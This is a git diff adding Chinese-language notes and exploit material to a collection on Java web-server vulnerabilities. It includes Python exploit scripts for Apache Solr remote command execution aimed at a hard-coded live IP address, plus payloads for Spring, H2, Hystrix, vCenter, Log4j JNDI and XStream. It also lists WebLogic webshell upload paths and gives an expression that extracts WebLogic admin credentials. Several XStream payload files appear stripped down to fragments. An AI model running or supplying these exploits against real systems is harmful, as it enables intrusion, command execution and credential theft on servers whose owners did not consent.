+ text ="%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22"+quote(cmd,'utf-8')+"%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%
65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20"
+ burp0_url = url+"/solr/"+info+"/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig="+text
+ burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+ "Accept-Encoding": "gzip, deflate",
+ "content-type": "multipart/form-data; boundary=------------------------aceb88c2159f183f"}
+ burp0_data = "\r\n--------------------------aceb88c2159f183f\r\nContent-Disposition: form-data; name=\"stream.body\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n--------------------------aceb88c2159f183f--"
+ requests_post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
+ print(requests_post.json()['documents'])
+
+if __name__ == '__main__':
+ info = getinfo("http://101.35.196.173:8983")
+ # exp1("http://101.35.196.173:8983",info,"ls /tmp/")
+ exp2("http://101.35.196.173:8983",info,'ls /tmp/')
+```
+
+**jndi注入**
+
+```
+
+
+
+
+
+
+
+```
+
+## CVE-2019-17558
+
+https://github.com/jas502n/solr_rce
+
+```python
+# -*- coding: utf-8 -*
+# /usr/bin/python3
+# @Author:Firebasky
+# 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。
+import requests
+
+url ="http://101.35.196.173:8983"
+cmd ="ls"
+
+burp0_url = url + "/solr/admin/cores?wt=json"
+r = requests.get(burp0_url, verify=False, allow_redirects=False)
+a = list(r.json()['status'].keys())
+
+burp0_url = url+"/solr/"+a[0]+"/config"
+burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"}
+burp0_json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
+requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
+
+burp0_url = url+"/solr/"+a[0]+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
+burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
+get = requests.get(burp0_url, headers=burp0_headers)
+print(get.text)
+```
+
+## 任意文件删除
+
+https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg
diff --git a/Spring/Readme.md b/Spring/Readme.md
index 93a82aa..d48eb5c 100644
--- a/Spring/Readme.md
+++ b/Spring/Readme.md
@@ -4,3 +4,19 @@
+ [cve-2016-4977]()
+ [cve-2017-4971]()
+ [cve-2018-1270]()
+
+## Spring Security
++ [Spring Security / MVC Path Matching Inconsistency(CVE-2016-5007)](https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173852&idx=1&sn=6b4a6c36c456b5e475b5247451c6dd81&chksm=833cf5aeb44b7cb895e1f67f8f6680e1a22124ce5e9e38d8a5e5321099f40e8acc01ac9e3c85&scene=4#wechat_redirect)
+
+```
+/%0dadmin
+```
+
++ [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞与利用场景分析](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490023&idx=1&sn=f7e654f69ceca1ff437d9431bdd8ffa7&chksm=cefda0f3f98a29e5556a31b28ba231613e49b0ff40fcee651fac351adc6376e2ad2b72509dbf&mpshare=1&scene=23&srcid=0521LQrB49HRCgrnaPZOD2ys&sharer_sharetime=1653110684149&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+
+原理就是默认情况下, 正则表达式中点(.)不会匹配换行符, 设置了Pattern.DOTALL模式, 才会匹配所有字符包括换行符。从而绕过
+
+
+
+
+小知识:[Java中正则表达式(regex)匹配多行(Pattern.MULTILINE和Pattern.DOTALL模式)](https://www.cjavapy.com/article/68/)
diff --git a/Springboot/CVE-2021-21234/Readme.md b/Springboot/CVE-2021-21234/Readme.md
new file mode 100644
index 0000000..3dda468
--- /dev/null
+++ b/Springboot/CVE-2021-21234/Readme.md
@@ -0,0 +1,5 @@
+# Spring Boot 目录遍历(CVE-2021-21234)
+
+>spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历
+
+https://www.freebuf.com/vuls/293243.html
diff --git a/Springboot/Readme.md b/Springboot/Readme.md
new file mode 100644
index 0000000..63baee0
--- /dev/null
+++ b/Springboot/Readme.md
@@ -0,0 +1,17 @@
+# Springboot 漏洞
+
+参考:https://github.com/LandGrey/SpringBootVulExploit
+写的非常全.
+
+**该系列漏洞主要是通过env的配置接口进行配置,刷新或者重启触发漏洞**
+
+补:0x07:h2 database console JNDI RCE
+
+限制:
+开启 -webAllowOthers 选项,支持外网访问
+开启 -ifNotExists 选项,支持创建数据库
+
+不需要出网利用:
+```
+language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=org.h2.Driver&url=jdbc%3ah2%3amem%3atest%3bMODE%3dMSSQLServer%3binit%3dCREATE+TRIGGER+shell3+BEFORE+SELECT+ON+INFORMATION_SCHEMA.TABLES+AS+$$//javascript%0a%0ajava.lang.Runtime.getRuntime().exec('cmd+/c+calc.exe')$$&user=sa&password=
+```
diff --git a/Springcolud/Readme.md b/Springcolud/Readme.md
new file mode 100644
index 0000000..ffe3da9
--- /dev/null
+++ b/Springcolud/Readme.md
@@ -0,0 +1,61 @@
+# Springcolud
+
+## CVE-2021-22053
+
+>今天有幸看到了三梦师傅写的[CVE-2021-22053: Spring Cloud Netflix Dashboard template resolution vulnerability](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) poc,在好自己最近在看spring-cloud这些微服务,然后就简单的看了看学习。
+
+先简单的介绍一下**hystrix**
+
+## Hystrix
+
+容错监控机制
+
+也就是微服务的容错机制是提前预设解决⽅案,系统进⾏⾃主调节,遇到问题及时处理
+
+### Hystrix的优点
+
+```
+服务隔离机制
+服务降级机制
+熔断机制
+提供实时的监控和报警功能
+提供实时的配置修改功能
+```
+
+而hystrix-dashboard 就是可视化界⾯组件。
+
+所以简单的说spring-cloud-starter-netflix-hystrix-dashboard 就是springcolud中的一个组件,是**Hystrix** 容错监控机制的可视化界⾯组件。
+
+
+
+## 复现
+
+三梦师傅也说明了漏洞版本
+
+漏洞版本:spring-cloud-starter-netflix-hystrix-dashboard **2.2.0.RELEASE to 2.2.9.RELEASE**
+
+并且三梦师傅提供了漏洞环境,本地搭建起测试了一下,成功利用。
+
+
+
+
+## 分析
+
+还是经典的对比分析,对比漏洞版本和fix版本
+
+
+
+
+可以发现漏洞版本对{path}变量可以控制,熟悉**Thymeleaf**模板注入的师傅一眼就可以看出来了。
+
+在该版本依赖的Thymeleaf组件版本是3.0.12。正好三梦师傅师傅之前写过文章bypass。前几天panda师傅也发了文章关于这部分进行介绍。
+
+
+
+
+poc
+
+```http
+http://127.0.0.1:8080/hystrix/;/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x/
+```
+
diff --git a/Struts2/README.md b/Struts2/README.md
index bbe2332..5f8b882 100644
--- a/Struts2/README.md
+++ b/Struts2/README.md
@@ -19,3 +19,8 @@
[漏洞版本](http://archive.apache.org/dist/struts/binaries/)

+
+## TODO
+分析各个s2 漏洞
+s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html)
+
diff --git a/Undertow/Readme.md b/Undertow/Readme.md
new file mode 100644
index 0000000..16d8a83
--- /dev/null
+++ b/Undertow/Readme.md
@@ -0,0 +1,5 @@
+# Undertow
+
+https://blog.csdn.net/hollis_chuang/article/details/104470945
+
+http://blog.hubwiz.com/2016/12/01/webserver-Undertow/
diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md
new file mode 100644
index 0000000..a4ff167
--- /dev/null
+++ b/VMware vCenter/Readme.md
@@ -0,0 +1,101 @@
+# vcenter
+
+### 版本查看
+
+```
+/sdk/vimServiceVersions.xml
+```
+
+### VMware vCenter Server 任意文件读取漏洞
+
+[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582)
+
+endpoint
+```
+/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
+```
+
+### CVE-2021-21972
+
+[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ)
+
+[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/)
+
+```
+VMware vCenter Server 7.0系列 < 7.0.U1c
+VMware vCenter Server 6.7系列 < 6.7.U3l
+VMware vCenter Server 6.5系列 < 6.5 U3n
+VMware ESXi 7.0系列 < ESXi70U1c-17325551
+VMware ESXi 6.7系列 < ESXi670-202102401-SG
+VMware ESXi 6.5系列 < ESXi650-202102101-SG
+```
+
+endpoint
+
+```
+/ui/vropspluginui/rest/services/uploadova
+```
+
+### CVE-2021-21985
+
+[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
+
+```
+VMware vCenter Server 7.0系列 < 7.0.U2b
+VMware vCenter Server 6.7系列 < 6.7.U3n
+VMware vCenter Server 6.5系列 < 6.5 U3p
+VMware Cloud Foundation 4.x 系列 < 4.2.1
+VMware Cloud Foundation 4.x 系列 < 3.10.2.1
+```
+
+### CVE-2021-22005
+
+[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641)
+
+```
+VMware vCenter Server 7.0
+VMware vCenter Server 6.7 Running On Virtual Appliance
+VMware Cloud Foundation (vCenter Server) 4.x
+VMware Cloud Foundation (vCenter Server) 3.x
+```
+
+### Log4j
+
+endpoint
+
+```
+/websso/SAML2/SSO/vsphere.local?SAMLRequest=
+
+X-Forwarded-For: ${jndi:ldap://exp}
+```
+
+
+
+### CVE-2022-31680
+
+[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587)
+
+```
+GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1
+Host: 192.168.0.109
+Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: application/json, text/plain, */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Pragma: no-cache
+Isangularrequest: true
+X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e
+Referer: https://192.168.0.109/psc/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+```
+
+### 后续利用
+
+[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg)
+
+[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
diff --git a/Weblogic/Readme.md b/Weblogic/Readme.md
new file mode 100644
index 0000000..b594381
--- /dev/null
+++ b/Weblogic/Readme.md
@@ -0,0 +1,31 @@
+# Weblogic
+
+http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86
+
+https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0
+
+http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/
+
+https://y4er.com/post/weblogic-jrmp/
+
+http://drops.xmd5.com/static/drops/web-13470.html
+
+https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704
+
+http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html
+
+## 内存木马
+https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g
+
+https://www.shuzhiduo.com/A/gVdnM4685W/
+
+https://xz.aliyun.com/t/10323#toc-49
+
+https://github.com/Y4er/WebLogic-Shiro-shell
+
+https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/
+
+https://kuron3k0.github.io/2021/04/29/weblogic-memshell-2/
+
+https://www.cnblogs.com/bitterz/p/14970230.html
+
diff --git a/Weblogic/Weblogic trick.md b/Weblogic/Weblogic trick.md
new file mode 100644
index 0000000..6153bc9
--- /dev/null
+++ b/Weblogic/Weblogic trick.md
@@ -0,0 +1,29 @@
+## Weblogic trick
+
+## 写文件rce
+
+```
+\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp
+访问:\bea_wls_internal\shell.jsp
+
+
+\server\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
+访问:\console\framework\skins\wlsconsole\images\shell.jsp
+
+\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp
+访问:\uddiexplorer\shell.jsp
+
+\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp
+
+访问:\项目名\shell.jsp
+```
+
+### 获得用户密码
+
+https://github.com/TideSec/Decrypt_Weblogic_Password
+
+el表达式
+
+```java
+${pageContext.setAttribute("classLoader",Thread.currentThread().getContextClassLoader());pageContext.setAttribute("httpDataTransferHandler",pageContext.getAttribute("classLoader").loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"));pageContext.setAttribute("managementService", pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.ManagementService"));pageContext.setAttribute("authenticatedSubject",pageContext.getAttribute("classLoader").loadClass("weblogic.security.acl.internal.AuthenticatedSubject"));pageContext.setAttribute("propertyService",pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.PropertyService"));pageContext.setAttribute("KERNE_ID",pageContext.getAttribute("httpDataTransferHandler").getDeclaredField("KERNE_ID"));pageContext.getAttribute("KERNE_ID").setAccessible(true);pageContext.setAttribute("getPropertyService",managementService.getMethod("getPropertyService",pageContext.getAttribute("authenticatedSubject")));pageContext.getAttribute("getPropertyService").setAccessible(true);pageContext.setAttribute("prop",pageContext.getAttribute("getPropertyService").invoke(null,pageContext.getAttribute("KERNE_ID").get((null))));pageContext.setAttribute("getTimestamp1",propertyService.getMethod("getTimestamp1"));pageContext.getAttribute("getTimestamp1").setAccessible(true);pageContext.setAttribute("getTimestamp2",propertyService.getMethod("getTimestamp2"));pageContext.getAttribute("getTimestamp2").setAccessible(true);pageContext.setAttribute("username", pageContext.getAttribute("getTimestamp1").invoke(pageContext.getAttribute("prop")));pageContext.setAttribute("password",pageContext.getAttribute("getTimestamp2").invoke(pageContext.getAttribute("prop")));pageContext.getAttribute("username").concat("/").concat(pageContext.getAttribute("password"))}
+```
diff --git a/Weblogic/img/image-20210815001234456.png b/Weblogic/img/image-20210815001234456.png
new file mode 100644
index 0000000..418450f
Binary files /dev/null and b/Weblogic/img/image-20210815001234456.png differ
diff --git a/Weblogic/img/image-20210815103726507.png b/Weblogic/img/image-20210815103726507.png
new file mode 100644
index 0000000..d433ccc
Binary files /dev/null and b/Weblogic/img/image-20210815103726507.png differ
diff --git a/Weblogic/img/image-20210815103750342.png b/Weblogic/img/image-20210815103750342.png
new file mode 100644
index 0000000..da8aa57
Binary files /dev/null and b/Weblogic/img/image-20210815103750342.png differ
diff --git a/Weblogic/img/image-20210815110026954.png b/Weblogic/img/image-20210815110026954.png
new file mode 100644
index 0000000..b2c83b0
Binary files /dev/null and b/Weblogic/img/image-20210815110026954.png differ
diff --git a/Weblogic/img/image-20210815110029190.png b/Weblogic/img/image-20210815110029190.png
new file mode 100644
index 0000000..b2c83b0
Binary files /dev/null and b/Weblogic/img/image-20210815110029190.png differ
diff --git a/Weblogic/img/image-20210815153940829.png b/Weblogic/img/image-20210815153940829.png
new file mode 100644
index 0000000..6e1fe42
Binary files /dev/null and b/Weblogic/img/image-20210815153940829.png differ
diff --git a/Xstream/Readme.md b/Xstream/Readme.md
new file mode 100644
index 0000000..73dc6d9
--- /dev/null
+++ b/Xstream/Readme.md
@@ -0,0 +1,144 @@
+# Xstream
+
+>该项目是为了整理Xstream的exp,有一些没有测试成功,欢迎pr。
+>
+>本来想写一个工具了生成exp,然后感觉这样整理出来也比较方便。。。。。懒。。
+
+| XStream 远程代码执行漏洞 | CVE-2013-7285 | 1.4.x
+
+
+ java.lang.Comparable
+
+
+
+ calc.exe
+
+
+ start
+
+
+
+```
+
+
+
+```xml
+1. 16进制绕过
+
+
+
+当前黑名单为org[.]springframework,此时的绕过方法可以为
+
+
+
+2. 针对标签属性内容的绕过
+
+
+
+此时的黑名单为custom,那么绕过方法可以为
+
+
+
+原理为读取属性内容时,会做符合要求的转化
+
+3. 针对标签内容的绕过
+
+ldap://xxxxx
+
+此时的黑名单为ldap://,可以用如下的几种方法绕过
+
+html编码:
+这部分在提取数据时,同样对html编码的内容做了转化
+
+ldap://xxxxx
+
+
+注释的方法:
+在处理实际的标签内容时,遇到注视内容将被忽略掉
+
+ldap://xxxxx
+
+```
+
+
+## 工具生成poc
+
+
+```
+java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream
+```
+
+
+
+配合yso生成xstream的exp。添加Xstream组件依赖
+
+```java
+package ysoserial.exploit;
+
+import clojure.lang.IFn;
+import com.thoughtworks.xstream.XStream;
+import ysoserial.payloads.ObjectPayload;
+
+@SuppressWarnings({
+ "rawtypes"
+})
+
+public class Xstream {
+ public static void main(String[] args) {
+ if(args.length<2){
+ System.out.println("exit");
+ }
+ final Object payloadObject = ObjectPayload.Utils.makePayloadObject(args[0],args[1]);
+ com.thoughtworks.xstream.XStream xstream = new XStream();
+ //System.out.println(payloadObject);
+ String s = xstream.toXML(payloadObject);
+ System.out.println(s);
+ ObjectPayload.Utils.releasePayload(args[0],payloadObject);
+ }
+}
+```
+
+
+
diff --git a/Xstream/exp/CSRF/CVE-2021-21349.xml b/Xstream/exp/CSRF/CVE-2021-21349.xml
new file mode 100644
index 0000000..fbaee11
--- /dev/null
+++ b/Xstream/exp/CSRF/CVE-2021-21349.xml
@@ -0,0 +1 @@
+no find...
\ No newline at end of file
diff --git a/Xstream/exp/DOS/CVE-2017-7957.xml b/Xstream/exp/DOS/CVE-2017-7957.xml
new file mode 100644
index 0000000..fbaee11
--- /dev/null
+++ b/Xstream/exp/DOS/CVE-2017-7957.xml
@@ -0,0 +1 @@
+no find...
\ No newline at end of file
diff --git a/Xstream/exp/DOS/CVE-2021-21348.xml b/Xstream/exp/DOS/CVE-2021-21348.xml
new file mode 100644
index 0000000..fbaee11
--- /dev/null
+++ b/Xstream/exp/DOS/CVE-2021-21348.xml
@@ -0,0 +1 @@
+no find...
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2013-7285-2.xml b/Xstream/exp/RCE/CVE-2013-7285-2.xml
new file mode 100644
index 0000000..1a29a2c
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2013-7285-2.xml
@@ -0,0 +1,20 @@
+
+
+ fookey
+ foovalue
+
+
+
+ java.lang.Comparable
+
+
+
+ calc.exe
+
+
+ start
+
+
+ good
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2013-7285.xml b/Xstream/exp/RCE/CVE-2013-7285.xml
new file mode 100644
index 0000000..9363080
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2013-7285.xml
@@ -0,0 +1,16 @@
+
+ foo
+
+ java.lang.Comparable
+
+
+
+ cmd
+ /C
+ calc
+
+
+ start
+
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2019-10173.xml b/Xstream/exp/RCE/CVE-2019-10173.xml
new file mode 100644
index 0000000..9363080
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2019-10173.xml
@@ -0,0 +1,16 @@
+
+ foo
+
+ java.lang.Comparable
+
+
+
+ cmd
+ /C
+ calc
+
+
+ start
+
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2020-26217.xml b/Xstream/exp/RCE/CVE-2020-26217.xml
new file mode 100644
index 0000000..7bab753
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2020-26217.xml
@@ -0,0 +1,54 @@
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21344.xml b/Xstream/exp/RCE/CVE-2021-21344.xml
new file mode 100644
index 0000000..35886a2
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21344.xml
@@ -0,0 +1,103 @@
+
+
+
+
+ 2
+
+
+
+
+
+
+
+
+ com.sun.rowset.JdbcRowSetImpl
+
+
+
+
+ com.sun.rowset.JdbcRowSetImpl
+ getDatabaseMetaData
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ 1
+
+
+ UTF-8
+
+
+
+
+
+
+
+
+ 1008
+ true
+ 1000
+ 0
+ 2
+ 0
+ 0
+ 0
+ true
+ 1004
+ false
+ {rmi}
+
+
+
+
+
+
+ -1
+ -1
+ -1
+ -1
+ -1
+ -1
+ -1
+ -1
+ -1
+ -1
+
+
+ foo
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ javax.xml.ws.binding.attachments.inbound
+ javax.xml.ws.binding.attachments.inbound
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21345.xml b/Xstream/exp/RCE/CVE-2021-21345.xml
new file mode 100644
index 0000000..d5b57da
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21345.xml
@@ -0,0 +1,59 @@
+
+
+
+
+ 2
+
+
+
+
+
+
+
+
+ com.sun.corba.se.impl.activation.ServerTableEntry
+
+
+
+
+ com.sun.corba.se.impl.activation.ServerTableEntry
+ verify
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ 1
+
+
+ UTF-8
+
+
+
+
+
+
+ {cmd}
+
+
+
+
+
+
+
+
+
+ 3
+ javax.xml.ws.binding.attachments.inbound
+ javax.xml.ws.binding.attachments.inbound
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21346.xml b/Xstream/exp/RCE/CVE-2021-21346.xml
new file mode 100644
index 0000000..fbaee11
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21346.xml
@@ -0,0 +1 @@
+no find...
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21347.xml b/Xstream/exp/RCE/CVE-2021-21347.xml
new file mode 100644
index 0000000..148ca8c
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21347.xml
@@ -0,0 +1 @@
+no find..
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21350.xml b/Xstream/exp/RCE/CVE-2021-21350.xml
new file mode 100644
index 0000000..148ca8c
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21350.xml
@@ -0,0 +1 @@
+no find..
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-21351.xml b/Xstream/exp/RCE/CVE-2021-21351.xml
new file mode 100644
index 0000000..c5895a2
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-21351.xml
@@ -0,0 +1,74 @@
+
+
+ ysomap
+
+
+
+ -10086
+
+ <__overrideDefaultParser>false
